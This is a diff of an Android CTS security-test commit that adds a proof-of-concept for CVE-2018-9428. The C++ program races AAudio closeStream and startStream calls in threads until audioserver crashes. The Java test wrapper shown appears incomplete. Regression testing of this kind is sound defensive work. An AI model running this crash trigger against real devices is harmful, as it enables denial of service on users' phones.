diff options
author | Ayushi Khopkar <ayushi.khopkar@ittiam.com> | 2020-10-01 07:32:52 +0000 |
---|---|---|
committer | Automerger Merge Worker <android-build-automerger-merge-worker@system.gserviceaccount.com> | 2020-10-01 07:32:52 +0000 |
commit | f56550296039be73630cc3cd83fb51116ba834fc (patch) | |
tree | 32f3ccfa03ad7a714b1cc24cabcbc04bffee47ed | |
parent | 5910f2c4528aadcb4b7dca5d4f67650ed4a7ce67 (diff) | |
parent | 6c2734df6d056929b871e4230d39d15ecfc0d241 (diff) | |
download | cts-f56550296039be73630cc3cd83fb51116ba834fc.tar.gz |
[RESTRICT AUTOMERGE] CTS test for Android Security b/74122779 am: 971b86d83c am: 6c2734df6d
Original change: https://googleplex-android-review.googlesource.com/c/platform/cts/+/12683271
Change-Id: Ic44331e9484bbc2a92342ff6fbb997e6c20804ef
4 files changed, 120 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml index 8e8fac23eb9..9a5c29d911b 100644 --- a/hostsidetests/securitybulletin/AndroidTest.xml +++ b/hostsidetests/securitybulletin/AndroidTest.xml @@ -187,6 +187,7 @@ <!--__________________--> <!-- Bulletin 2018-07 --> <!-- Please add tests solely from this bulletin below to avoid merge conflict --> + <option name="push" value="CVE-2018-9428->/data/local/tmp/CVE-2018-9428" /> <option name="push" value="CVE-2018-9424->/data/local/tmp/CVE-2018-9424" /> <!--__________________--> diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/Android.bp new file mode 100644 index 00000000000..a4c4f0aa506 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/Android.bp @@ -0,0 +1,30 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2018-9428", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + shared_libs: [ + "libmedia", + "libutils", + "libbinder", + "libaaudio_internal", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/poc.cpp new file mode 100644 index 00000000000..cf21dbcc4da --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/poc.cpp @@ -0,0 +1,78 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include "../includes/common.h" +#include "binding/IAAudioService.h" +#include <binder/IPCThreadState.h> +#include <binder/IServiceManager.h> + +using namespace android; +using namespace aaudio; + +typedef struct _thread_args { + aaudio_handle_t aaudioHandle; + sp<IAAudioService> aas; +} thread_args; + +static void *closeStreamThread(void *arg) { + thread_args *threadArgs = (thread_args *)arg; + if (threadArgs) { + if (threadArgs->aas) { + threadArgs->aas->closeStream(threadArgs->aaudioHandle); + } + } + return nullptr; +} + +static void *startStreamThread(void *arg) { + thread_args *threadArgs = (thread_args *)arg; + if (threadArgs) { + if (threadArgs->aas) { + threadArgs->aas->startStream(threadArgs->aaudioHandle); + } + } + return nullptr; +} + +int main() { + thread_args targs; + + sp<IServiceManager> sm = defaultServiceManager(); + sp<IBinder> binder = sm->getService(String16("media.aaudio")); + targs.aas = interface_cast<IAAudioService>(binder); + if (!(targs.aas)) { + return EXIT_FAILURE; + } + aaudio::AAudioStreamRequest request; + request.getConfiguration().setSharingMode(AAUDIO_SHARING_MODE_SHARED); + request.getConfiguration().setDeviceId(0); + request.getConfiguration().setSampleRate(AAUDIO_UNSPECIFIED); + + time_t currentTime = start_timer(); + while (timer_active(currentTime)) { + pthread_t pt[2]; + + aaudio::AAudioStreamConfiguration configurationOutput; + targs.aaudioHandle = targs.aas->openStream(request, configurationOutput); + pthread_create(&pt[0], nullptr, closeStreamThread, + &targs); /* close stream */ + pthread_create(&pt[1], nullptr, startStreamThread, + &targs); /* start stream */ + + sleep(5); + } + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java index 11f36bc3a76..f62bc8fe2a0 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java @@ -45,6 +45,17 @@ public class TestMedia extends SecurityTestCase { ******************************************************************************/ /** + * b/74122779 + * Vulnerability Behaviour: SIGABRT in audioserver + */ + @SecurityTest(minPatchLevel = "2018-07") + @Test + public void testPocCVE_2018_9428() throws Exception { + String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT}; + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2018-9428", getDevice()); + } + + /** * b/64340921 * Vulnerability Behaviour: SIGABRT in audioserver */ |